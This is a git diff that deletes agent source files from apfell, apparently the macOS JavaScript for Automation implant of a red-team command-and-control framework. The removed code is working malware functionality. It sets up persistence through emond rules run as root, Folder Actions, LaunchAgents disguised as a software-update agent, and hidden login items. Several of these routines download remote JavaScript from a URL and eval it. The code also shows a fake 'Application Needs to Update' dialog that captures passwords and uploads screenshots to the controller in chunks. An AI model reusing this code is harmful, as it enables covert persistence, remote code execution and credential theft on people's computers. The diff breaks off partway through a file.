ObjC.deepUnwrap(fileManager.contentsOfDirectoryAtPathError($(path), error)); - if (files !== undefined) { - let files_data = []; - output['success'] = true; - let sub_files = files; - if (path[path.length - 1] !== "/") { - path = path + "/"; - } - for (let i = 0; i < sub_files.length; i++) { - let attr = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(path + sub_files[i]), error)); - let file_add = {}; - file_add['name'] = sub_files[i]; - file_add['is_file'] = attr['NSFileType'] !== "NSFileTypeDirectory"; - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + sub_files[i]), $())); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - file_add['permissions'] = extended; - }else{ - file_add['permissions'] = {}; - } - file_add['size'] = attr['NSFileSize']; - let nsposix = attr['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits 
that make sense - file_add['permissions']['posix'] = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - file_add['permissions']['owner'] = attr['NSFileOwnerAccountName'] + "(" + attr['NSFileOwnerAccountID'] + ")"; - file_add['permissions']['group'] = attr['NSFileGroupOwnerAccountName'] + "(" + attr['NSFileGroupOwnerAccountID'] + ")"; - file_add['permissions']['hidden'] = attr['NSFileExtenionAttribute'] === true; - file_add['permissions']['create_time'] = attributes['NSFileCreationDate']; - file_add['modify_time'] = attributes['NSFileModificationDate']; - file_add['access_time'] = ""; - files_data.push(file_add); - } - output['files'] = files_data; - } - else{ - output['success'] = false; - } - } - let nsposix = attributes['NSFilePosixPermissions']; - let components = ObjC.deepUnwrap( fileManager.componentsToDisplayForPath(path) ).slice(1, -1); - if( components.length > 0 && components[0] === "Macintosh HD"){ - components.pop(); - } - output['parent_path'] = "/" + components.join("/"); - output['name'] = fileManager.displayNameAtPath(path).js; - if(output['name'] === "Macintosh HD"){output['name'] = "/";} - if(output['name'] === output['parent_path']){output['parent_path'] = "";} - output['size'] = attributes['NSFileSize']; - output['access_time'] = ""; - output['modify_time'] = attributes['NSFileModificationDate']; - if(attributes['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = attributes['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - output['permissions'] = extended; - }else{ - output['permissions'] = {}; - } - output['permissions']['create_time'] = attributes['NSFileCreationDate']; - output['permissions']['posix'] =((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - output['permissions']['owner'] = attributes['NSFileOwnerAccountName'] + "(" + attributes['NSFileOwnerAccountID'] + ")"; - output['permissions']['group'] = attributes['NSFileGroupOwnerAccountName'] + "(" + attributes['NSFileGroupOwnerAccountID'] + ")"; - output['permissions']['hidden'] = attributes['NSFileExtensionHidden'] === true; - if(command_params['file_browser'] === "true"){ - return {"file_browser": output, "completed": true, "user_output": "added data to file browser"}; - }else{ - return {"file_browser": output, "completed": true, "user_output": JSON.stringify(output, null, 6)}; - } - } - else{ - return { - "user_output": "Failed to get attributes of file. 
File doesn't exist or you don't have permission to read it", - "completed": true, - "status": "error" - }; - } - - }catch(error){ - return { - "user_output": "Error: " + error.toString(), - "completed": true, - "status": "error" - }; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_emond.js b/Payload_Types/apfell/agent_code/persist_emond.js deleted file mode 100755 index b0ac4648d..000000000 --- a/Payload_Types/apfell/agent_code/persist_emond.js +++ /dev/null @@ -1,98 +0,0 @@ -exports.persist_emond = function(task, command, params){ - try{ - //emond persistence from https://www.xorrior.com/emond-persistence/ - let config = JSON.parse(params); - // read "/System/Library/LaunchDaemons/com.apple.emond.plist" for the "QueueDirectories" key (returns array) - // create ".DS_Store" file there that's empty - // create new plist in "/etc/emond.d/rules/" - let rule_name = "update_files"; - if(config.hasOwnProperty('rule_name') && config['rule_name'] !== ""){rule_name = config['rule_name'];} - let payload_type = "oneliner-jxa"; - if(config.hasOwnProperty('payload_type') && config['payload_type'] !== ""){payload_type = config['payload_type'];} - if(payload_type === "oneliner-jxa"){ - if(config.hasOwnProperty('url') && config['url'] !== ""){var url = config['url'];} - else{ return "URL is required for the oneliner-jxa payload_type"; } - var command = "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('" + - url + "')),$.NSUTF8StringEncoding)))"; - // now we need to base64 encode our command - var command_data = $(command).dataUsingEncoding($.NSData.NSUTF16StringEncoding); - var base64_command = command_data.base64EncodedStringWithOptions(0).js; - var full_command = "echo \"" + base64_command + "\" | base64 -D | /usr/bin/osascript -l JavaScript &"; - } - else if(payload_type === "custom_bash-c"){ - if(config.hasOwnProperty('command') && config['command'] !== ""){var full_command = config['command'];} - else{ - return {"user_output":"command is a required field for the custom_bash-c payload_type", "completed": true, "status": "error"}; - } - } - // get our new plist file_name - if(config.hasOwnProperty('file_name') && config['file_name'] !== ""){ var file_name = config['file_name'];} - else{ return {"user_output":"file name is required", "completed": true, "status": "error"}; } - - var plist_contents = "\n" + - "\n" + - "\n" + - "\n" + - " \n" + - " name\n" + - " " + rule_name + "\n" + - " enabled\n" + - " \n" + - " eventTypes\n" + - " \n" + - " startup\n" + - " \n" + - " actions\n" + - " \n" + - " \n" + - " command\n" + - " /bin/sleep\n" + - " user\n" + - " root\n" + - " arguments\n" + - " \n" + - " 60\n" + - " \n" + - " type\n" + - " RunCommand\n" + - " \n" + - " \n" + - " command\n" + - " /bin/bash\n" + - " user\n" + - " root\n" + - " arguments\n" + - " \n" + - " -c\n" + - " " + full_command + "\n" + - " \n" + - " type\n" + - " RunCommand\n" + - " \n" + - " \n" + - " \n" + - "\n" + - ""; - // read the plist file and check the QueueDirectories field - var prefs = ObjC.deepUnwrap($.NSMutableDictionary.alloc.initWithContentsOfFile($("/System/Library/LaunchDaemons/com.apple.emond.plist"))); - //console.log(JSON.stringify(prefs)); - var queueDirectories = prefs['QueueDirectories']; - if(queueDirectories !== undefined && queueDirectories.length > 0){ - var queueDirectoryPath = queueDirectories[0]; - write_data_to_file(" ", queueDirectoryPath + "/.DS_Store"); - // now that we have a file in our queueDirectory, we need to write out our 
plist - write_data_to_file(plist_contents, "/etc/emond.d/rules/" + file_name); - - var user_output = "Created " + queueDirectoryPath + "/.DS_Store and /etc/emond.d/rules/" + file_name + " with contents: \n" + plist_contents; - - // announce our created artifacts and user output - let artifacts = {'user_output': user_output, 'artifacts': [{'base_artifact': 'File Create', 'artifact': queueDirectoryPath + "/.DS_Store"}, {'base_artifact': 'File Create', 'artifact': '/etc/emond.d/rules/' + file_name}], "completed": true}; - return artifacts - } - else{ - return {"user_output":"QueueDirectories array is either not there or 0 in length", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_folderaction.js b/Payload_Types/apfell/agent_code/persist_folderaction.js deleted file mode 100755 index 9de77dbc2..000000000 --- a/Payload_Types/apfell/agent_code/persist_folderaction.js +++ /dev/null @@ -1,67 +0,0 @@ -exports.persist_folderaction = function(task, command, params){ - try{ - // ======= Get params ======== - let json_params = JSON.parse(params); - let folder = json_params['folder']; - let script_path = json_params['script_path']; - let url = json_params['url']; - let code = json_params['code']; - let lang = json_params['language']; - let code1 = "var app = Application.currentApplication();\n" + - "app.includeStandardAdditions = true;\n" + - "app.doShellScript(\" osascript -l JavaScript -e \\\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('"; - let code2 = "')),$.NSUTF8StringEncoding)));\\\" &> /dev/null &\");"; - let output = ""; - // ======== Compile and write script to file ========== - ObjC.import('OSAKit'); - let mylang = ""; - let myscript = ""; - if(code !== ""){ - mylang = $.OSALanguage.languageForName(lang); - myscript = $.OSAScript.alloc.initWithSourceLanguage($(code),mylang); - }else{ - mylang = $.OSALanguage.languageForName("JavaScript"); - myscript = $.OSAScript.alloc.initWithSourceLanguage($(code1 + url + code2),mylang); - } - - myscript.compileAndReturnError($()); - let data = myscript.compiledDataForTypeUsingStorageOptionsError("osas", 0x00000003, $()); - data.writeToFileAtomically(script_path, true); - // ======= Handle the folder action persistence ======= - let se = Application("System Events"); - se.folderActionsEnabled = true; - let fa_exists = false; - let script_exists = false; - let myScript = se.Script({name: script_path.split("/").pop(), posixPath: script_path}); - let fa = se.FolderAction({name: folder.split("/").pop(), path: folder}); - // first check to see if there's a folder action for the path we're looking at - for(let i = 0; i < se.folderActions.length; i++){ - if(se.folderActions[i].path() === folder){ - // if our folder already has folder actions, just take the reference for later - fa = se.folderActions[i]; - fa_exists = true; - output += "Folder already has folder actions\n"; - break; - } - } - // if the folder action doesn't exist, add it - if(fa_exists === false){ - se.folderActions.push(fa); - } - // Check to see if this script already exists on this folder - for(let i = 0; i < fa.scripts.length; i++){ - if(fa.scripts[i].posixPath() === script_path){ - script_exists = true; - output += "Script already assigned to this folder\n"; - break; - } - } - if(script_exists === false){ - fa.scripts.push(myScript); - } - output += "Folder Action established"; 
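// Hypothetical verification sketch (not part of the original persist_folderaction.js):
// before returning, the same System Events collections used above could be walked one
// more time to confirm that the folder action and compiled script actually registered.
// It reuses only calls already shown in this function (folderActions, path(), scripts,
// posixPath()) and assumes the surrounding variables se, folder, script_path, and output.
let registered = false;
for(let i = 0; i < se.folderActions.length; i++){
    if(se.folderActions[i].path() !== folder){ continue; }
    for(let j = 0; j < se.folderActions[i].scripts.length; j++){
        if(se.folderActions[i].scripts[j].posixPath() === script_path){ registered = true; break; }
    }
}
if(!registered){ output += "\nWarning: script not yet visible on the folder action"; }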
- return {"user_output":output, "completed": true, "artifacts": [{"base_artifact":"File Create", "artifact": script_path}]}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_launch.js b/Payload_Types/apfell/agent_code/persist_launch.js deleted file mode 100755 index 7a0df5dfe..000000000 --- a/Payload_Types/apfell/agent_code/persist_launch.js +++ /dev/null @@ -1,60 +0,0 @@ -exports.persist_launch = function(task, command, params){ - try{ - let config = JSON.parse(params); - let template = "\n" + - "\n" + - "\n" + - "\n" + - "Label\n"; - let label = "com.apple.softwareupdateagent"; - if(config.hasOwnProperty('label') && config['label'] !== ""){label = config['label'];} - template += "" + label + "\n"; - template += "ProgramArguments\n"; - if(config.hasOwnProperty('args') && config['args'].length > 0){ - if(config['args'][0] === "apfell-jxa"){ - // we'll add in an apfell-jxa one liner to run - template += "/usr/bin/osascript\n" + - "-l\n" + - "JavaScript\n" + - "-e\n" + - "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('" + - config['args'][1] + "')),$.NSUTF8StringEncoding)))\n" - } - else{ - for(let i = 0; i < config['args'].length; i++){ - template += "" + config['args'][i] + "\n"; - } - } - } - else{ - return {"user_output": "Program args needs values for \"apfell-jxa\"", "completed": true, "status": "error"}; - } - template += "\n"; - if(config.hasOwnProperty('KeepAlive') && config['KeepAlive'] === true){ template += "KeepAlive\n\n"; } - if(config.hasOwnProperty('RunAtLoad') && config['RunAtLoad'] === true){ template += "RunAtLoad\n\n"; } - template += "\n\n" - // now we need to actually write out the plist to disk - let response = ""; - if(config.hasOwnProperty('LocalAgent') && config['LocalAgent'] === true){ - let path = "~/Library/LaunchAgents/"; - path = $(path).stringByExpandingTildeInPath; - var fileManager = $.NSFileManager.defaultManager; - if(!fileManager.fileExistsAtPath(path)){ - $.fileManager.createDirectoryAtPathWithIntermediateDirectoriesAttributesError(path, false, $(), $()); - } - path = $(path.js + "/" + label + ".plist"); - response = write_data_to_file(template, path) + " to " + ObjC.deepUnwrap(path); - let artifacts = {'user_output': response, 'artifacts': [{'base_artifact': 'File Create', 'artifact': ObjC.deepUnwrap(path)}], "completed": true}; - return artifacts - } - else if(config.hasOwnProperty('LaunchPath') && config['LaunchPath'] !== ""){ - response = write_data_to_file(template, $(config['LaunchPath'])) + " to " + config["LaunchPath"]; - let artifacts = {'user_output': response, 'artifacts': [{'base_artifact': 'File Create', 'artifact': config["LaunchPath"]}], "completed": true}; - return artifacts - } - return artifacts - - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js b/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js deleted file mode 100644 index 34cc8f58c..000000000 --- a/Payload_Types/apfell/agent_code/persist_loginitem_allusers.js +++ /dev/null @@ -1,22 +0,0 @@ -exports.persist_loginitem_allusers = function(task, command, params){ - ObjC.import('CoreServices'); - ObjC.import('Security'); - ObjC.import('SystemConfiguration'); - let args = JSON.parse(params); - // Obtain authorization for the global login item list - // Set the item as hidden: 
https://github.com/pkamb/OpenAtLogin/blob/master/OpenAtLogin.m#L35 - let auth; - let result = $.AuthorizationCreate($.nil, $.nil, $.kAuthorizationDefaults, Ref(auth)); - - if (result === 0) { - let temp = $.CFURLCreateFromFileSystemRepresentation($.kCFAllocatorDefault, args['path'], args['path'].length, false); - let items = $.LSSharedFileListCreate($.kCFAllocatorDefault, $.kLSSharedFileListGlobalLoginItems, $.nil); - $.LSSharedFileListSetAuthorization(items, auth); - let cfName = $.CFStringCreateWithCString($.nil, args['name'], $.kCFStringEncodingASCII); - let itemRef = $.LSSharedFileListInsertItemURL(items, $.kLSSharedFileListItemLast, cfName, $.nil, temp, $.nil, $.nil); - return {"user_output": "LoginItem installation successful", "completed": true}; - } else { - return {"user_output": `LoginItem installation failed: AuthorizationCreate returned ${result}`, "completed": true}; - } - -}; \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/plist.js b/Payload_Types/apfell/agent_code/plist.js deleted file mode 100755 index 0c989fab8..000000000 --- a/Payload_Types/apfell/agent_code/plist.js +++ /dev/null @@ -1,203 +0,0 @@ -exports.plist = function(task, command, params){ - try{ - let config = JSON.parse(params); - ObjC.import('Foundation'); - let output = []; - try{ - if(config['type'] === "read"){ - output = []; - let filename = $.NSString.alloc.initWithUTF8String(config['filename']); - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(filename); - let contents = ObjC.deepUnwrap(prefs); - let fileManager = $.NSFileManager.defaultManager; - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(config['filename']), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output.push(contents); - } - else if(config['type'] === "readLaunchAgents"){ - output = {}; - let fileManager = $.NSFileManager.defaultManager; - let error = Ref(); - let path = fileManager.homeDirectoryForCurrentUser.fileSystemRepresentation + "/Library/LaunchAgents/"; - let files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["localLaunchAgents"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - 
contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output["localLaunchAgents"][files[i]] = {}; - output["localLaunchAgents"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty("ProgramArguments")){ - //now try to get the attributes of the program this plist points to since it might have attribute issues for abuse - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - trimmed_attributes['NSFilePosixPermissions'] = posix; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - output["localLaunchAgents"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - }catch(error){ - return {"user_output":"Error trying to read ~/Library/LaunchAgents: " + error.toString(), "completed": true, "status": "error"}; - } - path = "/Library/LaunchAgents/"; - files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["systemLaunchAgents"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output['systemLaunchAgents'][files[i]] = {}; - output["systemLaunchAgents"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty("ProgramArguments")){ - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = 
attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - let nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - trimmed_attributes['NSFilePosixPermissions'] = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString();; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - output["systemLaunchAgents"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - } - catch(error){ - return {"user_output":"Error trying to read /Library/LaunchAgents: " + error.toString(), "completed": true, "status": "error"}; - } - } - else if(config['type'] === "readLaunchDaemons"){ - let fileManager = $.NSFileManager.defaultManager; - let path = "/Library/LaunchDaemons/"; - let error = Ref(); - output = {}; - let files = fileManager.contentsOfDirectoryAtPathError($(path), error); - try{ - // no errors, so now iterate over the files - files = ObjC.deepUnwrap(files); - output["systemLaunchDaemons"] = {}; - for(let i in files){ - let prefs = $.NSMutableDictionary.alloc.initWithContentsOfFile(path + files[i]); - let contents = ObjC.deepUnwrap(prefs); - if(contents === undefined){ contents = {};} - let plistPerms = ObjC.unwrap(fileManager.attributesOfItemAtPathError($(path + files[i]), $())); - let nsposix = {}; - let posix = ""; - if(plistPerms !== undefined){ - nsposix = plistPerms['NSFilePosixPermissions'].js; - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - if(plistPerms['NSFileExtendedAttributes'] !== undefined){ - let extended = {}; - let perms = plistPerms['NSFileExtendedAttributes'].js; - for(let j in perms){ - extended[j] = perms[j].base64EncodedStringWithOptions(0).js; - } - contents['PlistPermissionsExtendedAttributes'] = extended; - } - } - // we need to fix this mess to actually be real permission bits that make sense - contents['PlistPermissions'] = posix; - output['systemLaunchDaemons'][files[i]] = {}; - output["systemLaunchDaemons"][files[i]]['contents'] = contents; - if(contents !== undefined && contents.hasOwnProperty('ProgramArguments')){ - let attributes = ObjC.deepUnwrap(fileManager.attributesOfItemAtPathError($(contents['ProgramArguments'][0]), $())); - if(attributes !== undefined){ - let trimmed_attributes = {}; - trimmed_attributes['NSFileOwnerAccountID'] = attributes['NSFileOwnerAccountID']; - trimmed_attributes['NSFileExtensionHidden'] = attributes['NSFileExtensionHidden']; - trimmed_attributes['NSFileGroupOwnerAccountID'] = attributes['NSFileGroupOwnerAccountID']; - trimmed_attributes['NSFileOwnerAccountName'] = attributes['NSFileOwnerAccountName']; - trimmed_attributes['NSFileCreationDate'] = attributes['NSFileCreationDate']; - nsposix = attributes['NSFilePosixPermissions']; - // we need to fix this mess to actually be real permission bits that make sense - posix = ((nsposix >> 6) & 0x7).toString() + ((nsposix >> 3) & 0x7).toString() + (nsposix & 0x7).toString(); - trimmed_attributes['NSFilePosixPermissions'] = posix; - trimmed_attributes['NSFileGroupOwnerAccountName'] = attributes['NSFileGroupOwnerAccountName']; - trimmed_attributes['NSFileModificationDate'] = attributes['NSFileModificationDate']; - 
output["systemLaunchDaemons"][files[i]]['ProgramAttributes'] = trimmed_attributes; - } - } - } - } - catch(error){ - return {"user_output":"Failed to read launch daemons: " + error.toString(), "completed": true, "status": "error"}; - } - } - return {"user_output":JSON.stringify(output, null, 2), "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; - diff --git a/Payload_Types/apfell/agent_code/prompt.js b/Payload_Types/apfell/agent_code/prompt.js deleted file mode 100755 index c749a5e57..000000000 --- a/Payload_Types/apfell/agent_code/prompt.js +++ /dev/null @@ -1,27 +0,0 @@ -exports.prompt = function(task, command, params){ - let config = []; - if(params.length > 0){config = JSON.parse(params);} - else{config = [];} - let title = "Application Needs to Update"; - if(config.hasOwnProperty("title") && config['title'] !== ""){title = config['title'];} - let icon = "/System/Library/PreferencePanes/SoftwareUpdate.prefPane/Contents/Resources/SoftwareUpdate.icns"; - if(config.hasOwnProperty("icon") && config['icon'] !== ""){icon = config['icon'];} - let text = "An application needs permission to update"; - if(config.hasOwnProperty("text") && config['text'] !== ""){text = config['text'];} - let answer = ""; - if(config.hasOwnProperty("answer") && config['answer'] !== ""){answer = config['answer'];} - try{ - let prompt = currentApp.displayDialog(text, { - defaultAnswer: answer, - buttons: ['OK', 'Cancel'], - defaultButton: 'OK', - cancelButton: 'Cancel', - withTitle: title, - withIcon: Path(icon), - hiddenAnswer: true - }); - return {"user_output":prompt.textReturned, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/pwd.js b/Payload_Types/apfell/agent_code/pwd.js deleted file mode 100755 index b6fc60afb..000000000 --- a/Payload_Types/apfell/agent_code/pwd.js +++ /dev/null @@ -1,12 +0,0 @@ -exports.pwd = function(task, command, params){ - try{ - let fileManager = $.NSFileManager.defaultManager; - let cwd = fileManager.currentDirectoryPath; - if(cwd === undefined || cwd === ""){ - return {"user_output":"CWD is empty or undefined", "completed": true, "status": "error"}; - } - return {"user_output":cwd.js, "completed": true}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/report_routes.js b/Payload_Types/apfell/agent_code/report_routes.js deleted file mode 100644 index 2b53669fb..000000000 --- a/Payload_Types/apfell/agent_code/report_routes.js +++ /dev/null @@ -1,14 +0,0 @@ -exports.report_routes = function(task, command, params){ - let parameters = JSON.parse(params); - let edges = [ - { - "source": parameters['source'], - "destination": parameters['destination'], - "direction": parameters['direction'], - "action": parameters['action'], - "metadata": parameters['metadata'] - } - ]; - //C2.htmlPostData("api/v1.4/agent_message", data, apfell.id); - return {"user_output": "Route submitted", "completed": true, "edges": edges}; -}; diff --git a/Payload_Types/apfell/agent_code/rm.js b/Payload_Types/apfell/agent_code/rm.js deleted file mode 100755 index 84c928040..000000000 --- a/Payload_Types/apfell/agent_code/rm.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.rm = function(task, command, params){ - try{ - let 
command_params = JSON.parse(params); - let path = command_params['path']; - let fileManager = $.NSFileManager.defaultManager; - if(path[0] === '"'){ - path = path.substring(1, path.length-1); - } - let error = Ref(); - fileManager.removeItemAtPathError($(path), error); - return {"user_output":"Removed file", "completed": true, "removed_files": [{"path": path, "host": ""}]}; - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/run.js b/Payload_Types/apfell/agent_code/run.js deleted file mode 100755 index 7c09941be..000000000 --- a/Payload_Types/apfell/agent_code/run.js +++ /dev/null @@ -1,33 +0,0 @@ -exports.run = function(task, command, params){ - //launch a program and args via ObjC bridge without doShellScript and return response - let response = ""; - try{ - let pieces = JSON.parse(params); - let path = pieces['path']; - //console.log(path); - let args = pieces['args']; - let pipe = $.NSPipe.pipe; - let file = pipe.fileHandleForReading; // NSFileHandle - let task = $.NSTask.alloc.init; - task.launchPath = path; //'/bin/ps' - task.arguments = args; //['ax'] - task.standardOutput = pipe; // if not specified, literally writes to file handles 1 and 2 - task.standardError = pipe; - //console.log("about to launch"); - task.launch; // Run the command 'ps ax' - //console.log("launched"); - if(args[args.length - 1] !== "&"){ - //if we aren't tasking this to run in the background, then try to read the output from the program - // this will hang our main program though for now - let data = file.readDataToEndOfFile; // NSData, potential to hang here? - file.closeFile; - response = $.NSString.alloc.initWithDataEncoding(data, $.NSUTF8StringEncoding).js; - } - else{ - response = "launched program"; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - return {"user_output":response, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/screenshot.js b/Payload_Types/apfell/agent_code/screenshot.js deleted file mode 100755 index 450fed596..000000000 --- a/Payload_Types/apfell/agent_code/screenshot.js +++ /dev/null @@ -1,45 +0,0 @@ -exports.screenshot = function(task, command, params){ - try{ - ObjC.import('Cocoa'); - ObjC.import('AppKit'); - let cgimage = $.CGDisplayCreateImage($.CGMainDisplayID()); - if(cgimage.js === undefined) { - cgimage = $.CFMakeCollectable(cgimage); // in case 10.15 is messing with the types again - } - if(cgimage.js === undefined){ - return {"user_output":"Failed to get image from display", "completed": true, "status": "error"}; - } - let bitmapimagerep = $.NSBitmapImageRep.alloc.initWithCGImage(cgimage); - let capture = bitmapimagerep.representationUsingTypeProperties($.NSBitmapImageFileTypePNG, Ref()); - let offset = 0; - let chunkSize = 350000; - let fileSize = parseInt(capture.length); - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, 'task': task.id}; - let registerFile = C2.postResponse(task, registerData); - if (registerFile['responses'][0]['status'] === "success"){ - let currentChunk = 1; - let csize = capture.length - offset > chunkSize ? 
chunkSize : capture.length - offset; - let data = capture.subdataWithRange($.NSMakeRange(offset, csize)); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js, 'task': task.id, 'file_id': registerFile['responses'][0]['file_id']}; - C2.postResponse(task, fileData); - $.NSThread.sleepForTimeInterval(C2.gen_sleep_time()); - - // increment the offset and seek to the amount of data read from the file - offset = offset + parseInt(data.length); - csize = capture.length - offset > chunkSize ? chunkSize : capture.length - offset; - data = capture.subdataWithRange($.NSMakeRange(offset, csize)); - currentChunk += 1; - } - return {"user_output":JSON.stringify({"file_id": registerFile['responses'][0]['file_id']}), "completed": true}; - } - else{ - return {"user_output":"Failed to register file to download", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":"Failed to get a screencapture: " + error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/security_info.js b/Payload_Types/apfell/agent_code/security_info.js deleted file mode 100755 index 53fbbbbe9..000000000 --- a/Payload_Types/apfell/agent_code/security_info.js +++ /dev/null @@ -1,14 +0,0 @@ -exports.security_info = function(task, command, params){ - try{ - let secObj = Application("System Events").securityPreferences(); - let info = "automaticLogin: " + secObj.automaticLogin() + - 